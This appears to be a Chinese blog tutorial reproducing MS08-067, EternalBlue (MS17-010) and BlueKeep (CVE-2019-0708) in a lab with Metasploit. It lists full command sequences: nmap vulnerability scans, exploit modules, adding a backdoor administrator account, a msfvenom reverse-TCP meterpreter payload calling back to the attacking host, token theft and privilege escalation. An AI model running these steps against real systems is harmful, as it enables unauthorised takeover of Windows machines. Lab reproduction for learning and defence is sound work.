MSF本地漏洞复现

最新推荐文章于 2024-03-29 10:11:31 发布
最新推荐文章于 2024-03-29 10:11:31 发布
阅读量971 收藏 4
点赞数
分类专栏: 漏洞复现 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44508748/article/details/105732647
版权

MS08-067复现

MS08-067攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。它影响的Windows系统包括:Windows 2000、Windows XP、Windows Server 2003

  • 靶机:Windows XP;IP:192.168.1.20
    在这里插入图片描述

  • 攻击机:Kali系统;IP:192.168.1.7
    在这里插入图片描述

利用条件:

  • 靶机445端口开启
    在这里插入图片描述
  • 靶机防火墙关闭(netsh firewall set opmode mode=disable)

Nmap扫描探测该漏洞是否存在:

nmap -n -p 445 --script smb-vuln-ms08-067 192.168.1.20 --open

在这里插入图片描述

Msfconsole找到漏洞利用模块:

search ms08-067
use exploit/windows/smb/ms08_067_netapi

在这里插入图片描述

set rhost 192.168.1.20
show targets
set target 45  
#根据targets信息选择靶机信息

在这里插入图片描述

set payload generic/shell_bind_tcp #设置payload
# 设置本地监听地址和端口
set lhost 192.168.1.7
set lport 1122

options   #最终参数设置如下

在这里插入图片描述

run  # 建立会话,进行命令执行

在这里插入图片描述

ps           #  查看当前靶机进程
migrate 672  #  迁移到pid为672的程序进程上

在这里插入图片描述

run vnc  #  监控靶机桌面

KALI&XP傻傻的分不清楚

在这里插入图片描述

background      #挂起后台
sessions -l     #查看所有会话
sessions -i 1   #调用会话,1是指会话序号

MS017-010

攻击者利用永恒之蓝MS017-010漏洞在目标系统上可以执行任意代码。

复现环境

攻击机:kali-linux :192.168.1.7

在这里插入图片描述

靶机:windows 7 :192.168.1.8
在这里插入图片描述

利用条件:

1.smb 445端口开启
2.防火墙关闭
3.kali与靶机建立连接

漏洞利用:

nmap探测漏洞

nmap --script smb-vuln* 192.168.1.8

在这里插入图片描述

加载msf进行漏洞利用:

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.1.8
run

利用成功,命令执行:
在这里插入图片描述

添加用户且新增到管理员组

net user test 123456 /add
net localgroup administrator test /add

在这里插入图片描述

远程连接

exit
rdesktop 192.168.1.8

使用刚刚创建的test用户进行登陆
在这里插入图片描述
在这里插入图片描述

提权:

此时我们只是win7的管理员用户,需要进行系统权限的提升:

# 利用msf生成1.exe的payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.7 lport=1122 -f exe >1.exe

在这里插入图片描述

利用admin管理员用户将1.exe放进靶机win 7里面。

# kali设置监听会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

# kali设置本例监听地址和端口,然后开始监听
set lhost 192.168.1.7
set lport 1122
run

在这里插入图片描述

等待win 7 运行1.exe,建立meterpreter连接

尝试会话劫持

getuid
use incognito  # 劫持session
list_tokens -u  # 列出session
# 发现只是管理员权限,没有更高权限会话。无法进行会话劫持
background  # 挂起会话

在这里插入图片描述

利用ms15_051提权:

use exploit/windows/local/ms15_051_client_copy_image  
set session 1   #直接设置我刚刚挂载的会话
run

提权成功:
在这里插入图片描述

CVE-2019-0708复现

ps:复现这个漏洞有点跑题了,使用msf一直失败没有会话产生,所以下面是直接利用EXP复现的。

正文:

该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。影响Windows系统版本包括:

  • windows2003
  • windows2008
  • windows2008 R2
  • windows xp
  • win 7

复现环境:

kali攻击机:192.168.242.142

windows2008 R2靶机:192.168.1.8
在这里插入图片描述

利用条件:

1.靶机防火墙关闭
在这里插入图片描述

2.靶机3389端口开启
在这里插入图片描述

3.攻击机能通信靶机

复现步骤:

1.下载POC

git clone https://github.com/n1xbyte/CVE-2019-0708.git

在这里插入图片描述

2.为脚本文件添加可执行权限

chmod 777 crashpoc.py

在这里插入图片描述

3.如果没有以下安装模块,需要另外安装

pip3 install impacket
pip3 install Structure
pip list  #查看自己安装的所有python模块

4.利用脚本攻击

python crashpoc.py 192.168.1.8 64
#192.168.1.8 是目标IP 64是指系统版本

在这里插入图片描述

ps:不知道为啥脚本会报错,但是攻击成功能够 ok。不太求甚解…

5.攻击成功,合影留念:
在这里插入图片描述

=========================================================

在这里插入图片描述

Min1996
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
2401_83946826的博客
04-16 1046
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix 系列靶场,难度简单至中等,推荐初学者挑战
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限
利用 通达OA 文件上传漏洞上传webshell获取主机权限
最新发布
04-30
帮客户搭建一个演示环境,用于给领导演示,这里我利用了通达OA11.6文件上传漏洞往靶机上上传了一个webshell,然后通过蚁剑去连接webshell从而获取主机权限。 环境要求: 1.靶机环境win10 2.通达OA版本11.6 3.攻击机需要有java 4.攻击机我这里利用的通达OA的一个综合利用工具TDOA_RCE.jar,当然使用其他的工具也是可以的 使用人群: 针对想在安全方面有一定提高的各类网络安全人员。 提示: 仅供自己学习,请勿滥用。
Metaspoilt对(永恒之蓝)ms17-010的复现检测
cj_Hydra's Blog
02-18 487
前言: MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。2017年,The Shadow Brokers决定公开一部分有价值的工具,其中“eternalblue”(永恒之蓝)就是其中之一(漏洞编号m...
MSF漏洞复现
mackilo的博客
11-08 8350
ms10-018漏洞,它是IE浏览器漏洞,可以通过该漏洞获取目标主机的控制权。最严重的漏洞可能在用户使用IE浏览器查看特制网页时允许执行远程代码。详细信息。
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞
漏洞利用三:445端口漏洞利用
ZY95001的博客
09-04 1万+
445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。 靶机:win7系统 IP:10.0.0.199 提前关闭靶机防火墙 一、MS17-010 永恒之蓝 MS微软,17年,10号漏洞。即新闻上报道的比特币勒索病毒。 1.进入MSF控制台:msfconsole 2.找到要利用的漏洞输入编号(search命令):search ms17-010 3.查看组件列表,选择要利用的攻击项(use命令):use 0 4.以为此处提示需...
永恒之蓝(MS17-010)漏洞复现
tubug的博客
05-21 5334
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
traefik TLS/SSL 修复sweet32漏洞 [安全加固]——筑梦之路
筑梦之路
03-01 1328
之前已经写过关于nginx K8S组件修复sweet32安全漏洞的相关文章,关于sweet32安全漏洞就不再做过多的介绍,查阅了一些资料,很少有关于traefik修复SWEET32安全漏洞的相关文章,今天这里写一下如何修复traefik此漏洞,增强安全性。
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
kali 渗透msf
11-14
kali渗透测试利器
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 996
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 1924
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 2万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
网络安全漏洞复现kali
08-16
你可以通过以下步骤在Kali Linux上复现网络安全漏洞: 1. 安装Kali Linux:首先,从Kali Linux官方网站上下载并安装Kali Linux的最新版本。确保你的系统满足硬件要求,并按照官方指南进行安装。 2. 更新系统:安装完成后,打开终端并使用以下命令更新系统软件包: ``` sudo apt update sudo apt upgrade ``` 3. 选择漏洞和工具:根据你想要复现的具体漏洞,选择合适的工具。例如,如果你想复现Web应用程序的漏洞,可以使用Burp Suite或OWASP ZAP来进行渗透测试。 4. 设置实验环境:在复现漏洞之前,建议你在虚拟环境中设置一个实验环境。你可以使用虚拟机软件(如VirtualBox)创建一个虚拟机,并在其中安装你想要测试的目标应用程序。 5. 扫描目标:使用选定的工具对目标应用程序进行扫描,以寻找可能的漏洞。这些工具通常提供了各种扫描和攻击功能,可以帮助你发现潜在的漏洞。 6. 复现漏洞:一旦你找到了漏洞,你可以使用相应的工具和技术来尝试复现它。这可能涉及到发送特定的请求、利用漏洞或执行其他攻击方法。 7. 记录结果:在复现漏洞的过程中,务必详细记录你的操作和结果。这对于后续的分析和报告非常重要。 请注意,在进行任何网络安全测试之前,确保你已经获得了合法的授权,并遵守适用的法律和道德准则。此外,仅在你拥有合适的技术知识和经验的情况下进行漏洞复现,以避免对目标系统造成不必要的损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值